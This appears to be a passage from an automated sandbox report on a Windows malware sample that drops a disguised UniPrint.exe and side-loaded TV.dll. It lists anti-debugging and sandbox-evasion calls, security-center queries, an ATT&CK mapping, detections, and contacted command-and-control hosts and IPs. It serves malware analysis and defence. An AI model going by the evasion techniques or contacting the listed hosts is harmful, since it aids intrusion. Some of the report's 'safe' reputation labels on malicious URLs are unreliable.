Source: svchost.exe, 00000003.00000002.545837085.0000024FB0060000.00000004.00000001.sdmpBinary or memory string: "@Hyper-V RAW
Source: svchost.exe, 00000003.00000002.512388496.0000024FAA829000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW`S
Source: svchost.exe, 00000003.00000002.543297207.0000024FB0048000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000007.00000002.509995145.0000020167402000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 00000007.00000002.511295701.0000020167428000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.512172229.000001563502A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Anti Debugging:

barindex
Tries to detect sandboxes and other dynamic analysis tools (window names)Show sources
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeOpen window title or class name: ollydbg
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B890 FreeLibrary,GetProcessHeap,HeapFree,HeapDestroy,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_0051523A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_00534A9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

barindex
DLL side loading technique detectedShow sources
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_709854A0 LogonUserW,GetLastError,CloseHandle,
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_709834E0 OpenProcessToken,HeapAlloc,GetTokenInformation,GetTokenInformation,GetLastError,GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,ConvertSidToStringSidW,FreeSid,GetProcessHeap,HeapFree,CloseHandle,
Source: UniPrint.exe, 00000004.00000003.481410319.00000000057D5000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.515777614.000001D30BF90000.00000002.00020000.sdmpBinary or memory string: Program Manager
Source: UniPrint.exe, 00000004.00000002.528609535.0000000001280000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.515777614.000001D30BF90000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: UniPrint.exe, 00000004.00000002.528609535.0000000001280000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.515777614.000001D30BF90000.00000002.00020000.sdmpBinary or memory string: Progman
Source: UniPrint.exe, 00000004.00000003.303052348.00000000057D5000.00000004.00000001.sdmpBinary or memory string: Program ManagerX
Source: UniPrint.exe, 00000004.00000002.528609535.0000000001280000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.515777614.000001D30BF90000.00000002.00020000.sdmpBinary or memory string: Progmanlock
Source: UniPrint.exe, 00000004.00000003.481410319.00000000057D5000.00000004.00000001.sdmpBinary or memory string: Program Manager4
Source: UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWndThumbnailClassDV2ControlHostBaseBarTeamViewer_TitleBarWindowProgmanTVWidgetWin#32771teamviewerdebug.exeteamviewer.exeQuick Connect ButtonStartmenuTaskbarDesktopsidebar.exe\VarFileInfo\Translation\StringFileInfo\%04x%04x\FileDescription.exeOther applicationsSideBar_HTMLHostWindowSideBar_AppBarBulletBasicWindowTVWhiteboardOverlayWindowButtonEnableApplicationSelection: %1% (..\Server\WindowOberserver.cpp, 720)SelectAllWindows: %1%;%2% (..\Server\WindowOberserver.cpp, 751)SetSingleWindow (..\Server\WindowOberserver.cpp, 820)SessionEnded: %1% (..\Server\WindowOberserver.cpp, 827)SessionStart: %1%; type: %2% (..\Server\WindowOberserver.cpp, 910)HandleDesktopChanged: %1% (..\Server\WindowOberserver.cpp, 1017)Winlogonmap/set<T> too long
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: GetLocaleInfoA,_xtoa_s@20,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: _LcidFromHexString,GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_0054B459 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDList,74E3A680,lstrcat,lstrlen,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70988AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Changes security center settings (notifications, updates, antivirus, firewall)Show sources
Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
Source: svchost.exe, 0000000E.00000002.512252539.0000015E8B440000.00000004.00000001.sdmpBinary or memory string: "@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000E.00000002.510953306.0000015E8B413000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_00511D6F __EH_prolog3_catch,_memset,_memset,socket,WSAGetLastError,htonl,inet_addr,htons,WSAGetLastError,bind,bind,WSAGetLastError,Sleep,bind,listen,WSAGetLastError,select,WSAGetLastError,getsockname,WSAGetLastError,Sleep,__WSAFDIsSet,accept,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,WSAGetLastError,Sleep,GetTickCount,__WSAFDIsSet,WSAGetLastError,_strncmp,_strncmp,_strncpy,shutdown,Sleep,listen,Sleep,listen,WSAGetLastError,accept,Sleep,_memset,WSAGetLastError,_memset,select,_strncmp,

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts2Windows Management Instrumentation111DLL Side-Loading11DLL Side-Loading11Disable or Modify Tools1Input Capture1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Default AccountsNative API1DLL Search Order Hijacking2DLL Search Order Hijacking2Deobfuscate/Decode Files or Information1LSASS MemoryAccount Discovery1Remote Desktop ProtocolScreen Capture1Exfiltration Over BluetoothEncrypted Channel21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsService Execution12Create Account1Valid Accounts2Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesInput Capture1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Valid Accounts2Access Token Manipulation21Software Packing1NTDSSystem Information Discovery36Distributed Component Object ModelClipboard Data1Scheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronWindows Service22Windows Service22DLL Side-Loading11LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRegistry Run Keys / Startup Folder1Process Injection12DLL Search Order Hijacking2Cached Domain CredentialsSecurity Software Discovery371VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsRegistry Run Keys / Startup Folder1Masquerading11DCSyncVirtualization/Sandbox Evasion12Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobValid Accounts2Proc FilesystemProcess Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion12/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation21Network SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronProcess Injection12Input CaptureSystem Network Configuration Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
wogZe27GBB.exe9%MetadefenderBrowse
wogZe27GBB.exe71%ReversingLabsWin32.Worm.AutoRun

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll6%MetadefenderBrowse
C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll51%ReversingLabsWin32.Trojan.Phonzy
C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll0%MetadefenderBrowse
C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe0%MetadefenderBrowse
C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe0%ReversingLabs

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
0.2.wogZe27GBB.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File
0.0.wogZe27GBB.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://widolapsed.info/apsed.info/s/StoreAppName0%Avira URL Cloudsafe
http://188.172.198.151/dout.aspx?s=12418339&p=10000002&client=DynGate0%Avira URL Cloudsafe
http://188.172.198.151/dout.aspx?s=12418339&p=10000002&client=DynGated0%Avira URL Cloudsafe
https://widolapsed.info/apsed.info/B8C631A8/soft.Microsoft3DVi0%Avira URL Cloudsafe
https://widolapsed.info/apsed.info/B8C631A8/ources/DisplayNamev0%Avira URL Cloudsafe
https://widolapsed.info/apsed.info/tral_neutral_cw5n1h2txyewy?0%Avira URL Cloudsafe
https://widolapsed.info/apsed.info/0%Avira URL Cloudsafe
http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=100000010%Avira URL Cloudsafe
http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=100000020%Avira URL Cloudsafe
https://widolapsed.info/8C631A8/e0%Avira URL Cloudsafe
https://widolapsed.info/8C631A8/esources/StoreAppN0%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/80%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/90%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/ackageDisplayName0%Avira URL Cloudsafe
http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=10000%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/pName0%Avira URL Cloudsafe
https://widolapsed.info/apsed.info/8C631A8/90%Avira URL Cloudsafe
https://widolapsed.info/2i0%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/lopmentPropertiesl0%Avira URL Cloudsafe
https://widolapsed.info/a0%Avira URL Cloudsafe
https://widolapsed.info/8C631A8/90%Avira URL Cloudsafe
https://widolapsed.info/0%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/lopmentPropertiesh0%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/esources/StoreAppN0%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/d.info/B8C631A8/0%Avira URL Cloudsafe
https://widolapsed.info/3DViewer_2.1803.8022.0_x64_0%Avira URL Cloudsafe
http://crl.ver)0%Avira URL Cloudsafe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001v0%Avira URL Cloudsafe
https://widolapsed.info/ervice0%Avira URL Cloudsafe
https://widolapsed.info/i0%Avira URL Cloudsafe
https://%s.xboxlive.com0%URL Reputationsafe
https://widolapsed.info/apsed.info/ameCallableUI/resources/Pkg0%Avira URL Cloudsafe
https://widolapsed.info/vider/Resources/DisplayNamev0%Avira URL Cloudsafe
http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=10000002l0%Avira URL Cloudsafe
https://widolapsed.info/64__8wekyb3d8bbwe?ms-resource://Microso0%Avira URL Cloudsafe
https://widolapsed.info/~0%Avira URL Cloudsafe
https://dynamic.t0%URL Reputationsafe
https://widolapsed.info/B8C631A8/resource://Microso0%Avira URL Cloudsafe
https://widolapsed.info/8C631A8/ources/DisplayNamev0%Avira URL Cloudsafe
https://widolapsed.info/-resource://Microsoft.Microsoft3DViewer40%Avira URL Cloudsafe
http://188.172.198.151/client=DynGate&rnd=78504903&p=100000010%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/ources/DisplayNamev0%Avira URL Cloudsafe
http://188.172.198.151/dout.aspx?s=12418339&p=10000002&client0%Avira URL Cloudsafe
https://widolapsed.info/8C631A8/resource://Microso0%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/leUI/resources/Pkg0%Avira URL Cloudsafe
https://widolapsed.info/8C631A8/al_cw5n1h2txyewy?m00%Avira URL Cloudsafe
https://widolapsed.info/apsed.info/3DViewer_2.1803.8022.0_x64_0%Avira URL Cloudsafe
http://ocsp.sectigo.com00%URL Reputationsafe
https://widolapsed.info/apsed.info/B8C631A8/lopmentPropertiesh0%Avira URL Cloudsafe
http://188.172.198.151/0%Avira URL Cloudsafe
https://widolapsed.info/10%Avira URL Cloudsafe
https://widolapsed.info/s/StoreAppName0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
master12.teamviewer.com
185.188.32.22
truefalse
    		high
    widolapsed.info
    		45.153.241.148
    		truefalse
      		high
      ping3.dyngate.com
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://188.172.198.151/dout.aspx?s=12418339&p=10000002&client=DynGatefalse
        • Avira URL Cloud: safe
        		unknown
        http://master12.teamviewer.com/dout.aspx?s=40082849&p=10000001&client=DynGate&data=FyQSawCjHqkys5MkoZ6aGJqbGZocGBMkoh6YEyagoZ6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyakoh6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyepnqu0txmXGJiTKx6YmpcYFxscG5AoqQ==false
          		high
          http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001false
          • Avira URL Cloud: safe
          		unknown
          http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=10000002false
          • Avira URL Cloud: safe
          		unknown
          http://master12.teamviewer.com/din.aspx?s=40082864&client=DynGate&p=10000002false
            		high
            http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001false
              		high
              http://master12.teamviewer.com/dout.aspx?s=40082864&p=10000001&client=DynGate&data=FyQS8gCjHqmyuim0s7cwujq5MqWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAAASAAApKaCYgAIAAAiAAAB7ySFOURDklGN3FXhtz5fQYcmcXiwT9YXrd7SP4wIu0YyOFYq9yPUEQYpaG7+wnhbl5r+tU8j1VcHRkBZSOJG/A0Y7yY1YSgbi8gOUCGFRO/w26w+YKCZHaxwju7In6AFwX2azSetPIMUWj5HFTKPx6LGZM3a+27DQaxFWt7lD4A==false
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.teamviewer.com/help/support.aspxKwogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                  		high
                  https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campaiUniPrint.exe, 00000004.00000002.531799578.00000000027A0000.00000004.00000001.sdmpfalse
                    		high
                    https://widolapsed.info/apsed.info/s/StoreAppNameUniPrint.exe, 00000004.00000003.451977098.00000000057D5000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://188.172.198.151/dout.aspx?s=12418339&p=10000002&client=DynGatedUniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmpfalse
                      		high
                      https://widolapsed.info/apsed.info/B8C631A8/soft.Microsoft3DViUniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://widolapsed.info/apsed.info/B8C631A8/ources/DisplayNamevUniPrint.exe, 00000004.00000003.415242974.00000000057D5000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://widolapsed.info/apsed.info/tral_neutral_cw5n1h2txyewy?UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://widolapsed.info/apsed.info/UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.466393951.00000000057D5000.00000004.00000001.sdmpfalse
